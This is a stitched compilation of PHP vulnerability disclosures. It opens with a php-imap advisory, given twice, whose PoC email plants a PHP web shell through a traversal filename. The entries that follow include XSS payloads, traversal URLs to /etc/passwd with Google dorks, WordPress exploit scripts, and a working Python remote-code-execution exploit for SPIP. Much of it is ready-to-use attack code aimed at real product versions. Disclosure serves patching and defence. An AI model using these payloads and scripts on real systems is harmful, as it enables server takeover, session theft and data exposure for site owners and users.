### Summary
An unsanitized attachment filename allows any unauthenticated user to leverage a directory traversal vulnerability which results in a remote code execution vulnerability.

### Details
An attacker can send an email with a malicious attachment to the inbox, which gets crawled with webklex/php-imap or webklex/laravel-imap. Prerequisite for the vulnerability is that the script stores the attachments without providing a `$filename`, or providing an unsanitized `$filename`, in `src/Attachment::save(string $path, string $filename = null)` (https://github.com/Webklex/php-imap/blob/5.2.0/src/Attachment.php#L251-L255).
In this case, where no `$filename` gets passed into the `Attachment::save()` method, the package would use a series of unsanitized and insecure input values from the mail as fallback (https://github.com/Webklex/php-imap/blob/5.2.0/src/Attachment.php#L252).
Even if a developer passes a `$filename` into the `Attachment::save()` method, e.g. by passing the name or filename of the mail attachment itself (from email headers), the input values never get sanitized by the package.
There is also no restriction about the file extension (e.g. ".php") or the contents of a file. This allows an attacker to upload malicious code of any type and content at any location where the underlying user has write permissions.
The attacker can also overwrite existing files and inject malicious code into files that, e.g. get executed by the system via cron, requests,...
The official documentation only shows examples of `Attachment::save()` without providing the `$filename` (https://www.php-imap.com/api/attachment), which makes this vulnerability even more widespread.

### PoC
1. send an email with a malicious attachment to an inbox, which gets crawled by the package
```
Return-Path: <attacker@example.com>
Date: Fri, 17 Aug 2018 14:36:24 +0000
From: Attacker <attacker@example.com>
To: Victim <victim@example.com>
MIME-Version: 1.0
Content-Type: multipart/mixed;
 boundary="_=_swift_v4_1534516584_32c032a3715d2dfd5cd84c26f84dba8d_=_"

Mail with malicious attachment

--_=_swift_v4_1534516584_32c032a3715d2dfd5cd84c26f84dba8d_=_
Content-Type: application/octet-stream; name=shell.php
Content-Transfer-Encoding: 8bit
Content-Disposition: attachment; filename=../../../../../../../../../../../../var/www/shell.php

<?php
// RCE
system($_GET['cmd'] ?? '#');
?>

--_=_swift_v4_1534516584_32c032a3715d2dfd5cd84c26f84dba8d_=_--


```
3. crawl email with malicious attachment
4. store the attachment with `Attachment::save('/path/to/storage')` without providing a `$filename` value

### Impact
This is a remote code execution vulnerability that is made possible through a directory traversal vulnerability.
Every application that stores attachments with `Attachment::save()` without providing a `$filename` or passing unsanitized user input is affected by this attack.


**Summary**

An unsanitized attachment filename allows any unauthenticated user to leverage a directory traversal vulnerability which results in a remote code execution vulnerability.

**Details**

An attacker can send an email with a malicious attachment to the inbox, which gets crawled with webklex/php-imap or webklex/laravel-imap. Prerequisite for the vulnerability is that the script stores the attachments without providing a $filename, or providing an unsanitized $filename, in src/Attachment::save(string $path, string $filename = null) (https://github.com/Webklex/php-imap/blob/5.2.0/src/Attachment.php#L251-L255).  
In this case, where no $filename gets passed into the Attachment::save() method, the package would use a series of unsanitized and insecure input values from the mail as fallback (https://github.com/Webklex/php-imap/blob/5.2.0/src/Attachment.php#L252).  
Even if a developer passes a $filename into the Attachment::save() method, e.g. by passing the name or filename of the mail attachment itself (from email headers), the input values never get sanitized by the package.  
There is also no restriction about the file extension (e.g. ".php") or the contents of a file. This allows an attacker to upload malicious code of any type and content at any location where the underlying user has write permissions.  
The attacker can also overwrite existing files and inject malicious code into files that, e.g. get executed by the system via cron, requests,...  
The official documentation only shows examples of Attachment::save() without providing the $filename (https://www.php-imap.com/api/attachment), which makes this vulnerability even more widespread.

**PoC**

1.  send an email with a malicious attachment to an inbox, which gets crawled by the package

    Return-Path: <attacker@example.com>
    Date: Fri, 17 Aug 2018 14:36:24 +0000
    From: Attacker <attacker@example.com>
    To: Victim <victim@example.com>
    MIME-Version: 1.0
    Content-Type: multipart/mixed;
     boundary="_=_swift_v4_1534516584_32c032a3715d2dfd5cd84c26f84dba8d_=_"
    
    Mail with malicious attachment
    
    --_=_swift_v4_1534516584_32c032a3715d2dfd5cd84c26f84dba8d_=_
    Content-Type: application/octet-stream; name=shell.php
    Content-Transfer-Encoding: 8bit
    Content-Disposition: attachment; filename=../../../../../../../../../../../../var/www/shell.php
    
    <?php
    // RCE
    system($_GET['cmd'] ?? '#');
    ?>
    
    --_=_swift_v4_1534516584_32c032a3715d2dfd5cd84c26f84dba8d_=_--
    
    
    

3.  crawl email with malicious attachment
4.  store the attachment with Attachment::save('/path/to/storage') without providing a $filename value

**Impact**

This is a remote code execution vulnerability that is made possible through a directory traversal vulnerability.  
Every application that stores attachments with Attachment::save() without providing a $filename or passing unsanitized user input is affected by this attack.

**References**

*   GHSA-47p7-xfcc-4pv9
*   Webklex/php-imap#414
*   https://github.com/Webklex/php-imap/blob/5.2.0/src/Attachment.php#L251-L255
*   https://github.com/Webklex/php-imap/blob/5.2.0/src/Attachment.php#L252
*   https://github.com/Webklex/php-imap/releases/tag/5.3.0

GHSA-47p7-xfcc-4pv9: php-imap vulnerable to RCE through a directory traversal vulnerability

User Registration & Login and User Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /admin/search-result.php.

Permalink

**1** contributor

**Users who have contributed to this file**

Exploit Title:User Registration & Login and User Management System v1.0 - cross-site scripting (XSS) vulnerability

the component - /admin/search-result.php.

Vendor of Product - https://phpgurukul.com/

Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/

Tested on: Linux

Attack Type - Local

Attack Vectors- searchkey

CVE-2023-33591: CVE/CVE 2023-33591 at main · DARSHANAGUPTA10/CVE

PHP Online School version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.netartmedia.net/online-school/                                 ││  Vendor   : NetArt Media                                                               ││  Software : PHP Online School 1.0                                                      ││  Vuln Type: Reflected XSS - Stored XSS                                                 ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││                                                                                        ││  Reflected XSS                                                                         ││                                                                                        ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        ││                                                                                        ││  Stored XSS                                                                            ││                                                                                        ││  Allow Attacker to inject malicious code into website, give ability to steal sensitive ││  information, manipulate data, and launch additional attacks.                          ││                                                                                        │   ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpURL parameter is vulnerable to RXSShttps://website/users/index.php?category=home&action=welcome&category=home&action=welcome&order=date&order_type=desc&e9m9f"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"fgok8=1## Stored XSSPOST /online-school/users/index.php HTTP/2-----------------------------124654322118707720774051212206Content-Disposition: form-data; name="title"Any Title-----------------------------124654322118707720774051212206Content-Disposition: form-data; name="post_message"-----------------------------124654322118707720774051212206Content-Disposition: form-data; name="message"[XSS Payload]-----------------------------124654322118707720774051212206## Steps to Reproduce:1. Signup & Login in any Normal User Mode2. Go to [My Question] Click [Ask a New Question] on this Path (https://website/users/index.php?category=tickets&action=new)3. Select Any Subject4. Write any Title5. Inject your [XSS Payload] in "Message Box"6. Select Any Priority7. Press Submit8. When ADMIN check Student Questions on this Path (https://website/admin/index.php?category=tickets&action=new)9. XSS Will Fire and Executed on his Browser [-] Done

PHP Online School 1.0 Cross Site Scripting

PHP Mail version 5.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.netartmedia.net/mall/                                          ││  Vendor   : NetArt Media                                                               ││  Software : PHP Mall 5.0                                                               ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpURL parameter is vulnerable to RXSShttps://website/index.php?proceed_search=1&mod=products&lang=en&search_by=&proceed_search=1&mod=products&lang=en&search_by=&num=2&iv3s6"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"b6yhe=1[-] Done

PHP Mall 5.0 Cross Site Scripting

WordPress Super Socializer plugin version 7.13.52 suffers from a cross site scripting vulnerability.

    # Exploit Title: Super Socializer 7.13.52 - Reflected XSS# Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com# Date: 2023-06-20# Exploit Author: Amirhossein Bahramizadeh# Category : Webapps# Vendor Homepage: https://wordpress.org/plugins/super-socializer# Version: 7.13.52 (REQUIRED)# Tested on: Windows/Linux# CVE : CVE-2023-2779import requests# The URL of the vulnerable AJAX endpointurl = "https://example.com/wp-admin/admin-ajax.php"# The vulnerable parameter that is not properly sanitized and escapedvulnerable_param = "<img src=x onerror=alert(document.domain)>"# The payload that exploits the vulnerabilitypayload = {"action": "the_champ_sharing_count", "urls[" + vulnerable_param + "]": "https://www.google.com"}# Send a POST request to the vulnerable endpoint with the payloadresponse = requests.post(url, data=payload)# Check if the payload was executed by searching for the injected script tagif "<img src=x onerror=alert(document.domain)>" in response.text:    print("Vulnerability successfully exploited")else:    print("Vulnerability not exploitable")

WordPress Super Socializer 7.13.52 Cross Site Scripting

Accent Microcomputers CMS version 2.4 suffers from a directory traversal vulnerability.

    ====================================================================================================================================| # Title     : Accent Microcomputers CMS v 2.4 Directory Traversal Vulnerability                                                  || # Author    : indoushka                                                                                                          || # Telegram  : @indoushka                                                                                                         || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : http://www.accent.com.pl                                                                                           |  | # Dork      : n/a                                                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] use payload : ../../../../../../../../../etc/passwdhttp://127.0.0.1/www/mmrtradingpl/index.php?id=50&file=../../../../../../../../../etc/passwdhttp://127.0.0.1/www/transcomfortpl/index.php?id=50&file=../../../../../../../../../etc/passwd=====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh        |============================================================================================================================================

Accent Microcomputers CMS 2.4 Directory Traversal

PHP Car Dealer version 3.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.netartmedia.net/autodealer/                                    ││  Vendor   : NetArt Media                                                               ││  Software : PHP Car Dealer 3.0                                                         ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpURL parameter is vulnerable to RXSShttps://www.website/index.php?page=en_Latest%20Listings&page=en_Latest%20Listings&order_by=price_max&bprcc"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"madvv=1[-] Done

PHP Car Dealer 3.0 Cross Site Scripting

WordPress WP Sticky Social plugin version 1.0.1 suffers from cross site request forgery and cross site scripting vulnerabilities.

    # Exploit Title: WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)#  Dork: inurl:~/admin/views/admin.php# Date: 2023-06-20# Exploit Author: Amirhossein Bahramizadeh# Category : Webapps# Vendor Homepage: https://wordpress.org/plugins/wp-sticky-social# Version: 1.0.1 (REQUIRED)# Tested on: Windows/Linux# CVE : CVE-2023-3320import requestsimport hashlibimport time# Set the target URLurl = "http://example.com/wp-admin/admin.php?page=wpss_settings"# Set the user agent stringuser_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"# Generate the nonce valuenonce = hashlib.sha256(str(time.time()).encode('utf-8')).hexdigest()# Set the data payloadpayload = {    "wpss_nonce": nonce,    "wpss_setting_1": "value_1",    "wpss_setting_2": "value_2",    # Add additional settings as needed}# Set the request headersheaders = {    "User-Agent": user_agent,    "Referer": url,    "Cookie": "wordpress_logged_in=1; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26uploader%3Dwp-plupload%26urlbutton%3Dfile; wp-settings-time-1=1495271983",    # Add additional headers as needed}# Send the POST requestresponse = requests.post(url, data=payload, headers=headers)# Check the response status codeif response.status_code == 200:    print("Request successful")else:    print("Request failed")

WordPress WP Sticky Social 1.0.1 CSRF / Cross Site Scripting

3CX Open Standards Software IP PBX Thailand version 2.0.3 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : 3CX Open Standards Software IP PBX Thailand v 2.0.3 XSS Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://3cx.com                                                                                                    |  | # Dork      : intext:''3CX: Open Standards Software IP PBX''                                                                     |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /eventdetail.php?type_id=43&events_id=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+]  http://127.0.0.1/3cx/eventdetail.php?type_id=43&events_id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

3CX Open Standards Software IP PBX Thailand 2.0.3 Cross Site Scripting

SPIP versions 4.2.1 and below suffer from an unauthenticated remote code execution vulnerability.

    #!/usr/bin/env python3# -*- coding: utf-8 -*-# Exploit Title: SPIP v4.2.1 - Remote Code Execution (Unauthenticated)# Google Dork: inurl:"/spip.php?page=login"# Date: 19/06/2023# Exploit Author: nuts7 (https://github.com/nuts7/CVE-2023-27372)# Vendor Homepage: https://www.spip.net/# Software Link: https://files.spip.net/spip/archives/# Version: < 4.2.1 (Except few fixed versions indicated in the description)# Tested on: Ubuntu 20.04.3 LTS, SPIP 4.0.0# CVE reference : CVE-2023-27372 (coiffeur)# CVSS : 9.8 (Critical)## Vulnerability Description:## SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. Branches 3.2, 4.0, 4.1 and 4.2 are concerned. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.# This PoC exploits a PHP code injection in SPIP. The vulnerability exists in the `oubli` parameter and allows an unauthenticated user to execute arbitrary commands with web user privileges.## Usage: python3 CVE-2023-27372.py http://example.comimport argparseimport bs4import htmlimport requestsdef parseArgs():    parser = argparse.ArgumentParser(description="Poc of CVE-2023-27372 SPIP < 4.2.1 - Remote Code Execution by nuts7")    parser.add_argument("-u", "--url", default=None, required=True, help="SPIP application base URL")    parser.add_argument("-c", "--command", default=None, required=True, help="Command to execute")    parser.add_argument("-v", "--verbose", default=False, action="store_true", help="Verbose mode. (default: False)")    return parser.parse_args()def get_anticsrf(url):    r = requests.get('%s/spip.php?page=spip_pass' % url, timeout=10)    soup = bs4.BeautifulSoup(r.text, 'html.parser')    csrf_input = soup.find('input', {'name': 'formulaire_action_args'})    if csrf_input:        csrf_value = csrf_input['value']        if options.verbose:            print("[+] Anti-CSRF token found : %s" % csrf_value)        return csrf_value    else:        print("[-] Unable to find Anti-CSRF token")        return -1def send_payload(url, payload):    data = {        "page": "spip_pass",        "formulaire_action": "oubli",        "formulaire_action_args": csrf,        "oubli": payload    }    r = requests.post('%s/spip.php?page=spip_pass' % url, data=data)    if options.verbose:        print("[+] Execute this payload : %s" % payload)    return 0if __name__ == '__main__':    options = parseArgs()    requests.packages.urllib3.disable_warnings()    requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'    try:        requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'    except AttributeError:        pass    csrf = get_anticsrf(url=options.url)    send_payload(url=options.url, payload="s:%s:\"<?php system('%s'); ?>\";" % (20 + len(options.command), options.command))

Tag

#php